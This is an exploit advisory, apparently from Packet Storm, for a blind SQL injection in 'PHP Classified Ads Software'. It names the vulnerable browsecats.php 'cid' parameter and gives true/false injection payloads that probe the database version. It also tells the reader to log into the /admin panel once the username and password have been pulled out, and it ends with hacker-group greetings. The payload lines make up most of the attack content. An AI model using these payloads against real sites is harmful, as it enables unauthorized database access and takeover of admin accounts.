PHP Classified Ads Software suffers from a remote blind SQL injection vulnerability.
af79a70a9e814146165ea6ab750f919456c34db97175e1ac02b674ec40f4142b==
[-]Author: BorN To K!LL - h4ck3r
[-]Contact: SQL@hotmail.co.uk
==
[-]Script: PHP Classified ads software
[-]Version: n/a
[-]Link: http://www.softbizsolutions.com/classified-ads-software.php
==
[-]3xploit:
[path]/browsecats.php?cid=[Blind-Injection]
[-]3xample:
[path]/browsecats.php?cid=2 and substring(version(),1,1)=4 // false ,,
[path]/browsecats.php?cid=2 and substring(version(),1,1)=5 // true ,,
[-]Note:
after getting the username and the password you can login to admin panel
[path]/admin
==
[-]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed